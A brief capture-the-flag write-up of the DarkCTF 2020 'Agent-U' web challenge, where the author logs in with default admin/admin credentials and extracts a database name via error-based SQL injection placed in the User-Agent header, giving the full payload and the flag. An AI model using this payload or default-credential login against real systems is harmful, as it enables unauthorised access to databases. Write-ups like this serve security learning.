DarkCTF 2020: Web/Agent-U

Web/Agent-U

395 points

Agent U stole a database from my company but I don’t know which one. Can u help me to find it?
http://agent.darkarmy.xyz/
flag format darkCTF{databasename}

Solution

From the source we can get info, that default credentials are admin/admin.

agent u1

Site after login shows my user agent, so my first idea was to perform sql injection through my user agent.

agent u2

After few attempts I ended up finally with below user agent setup ;-)

', extractvalue(rand(),concat(0x3a,(SELECT concat(0x3a,schema_name) FROM information_schema.schemata LIMIT 1,1))), NULL); -- .

BINGO!

agent u3

darkCTF{ag3ntu1sv3ryt3l3nt3d}

Privacy Policy
luc © 2021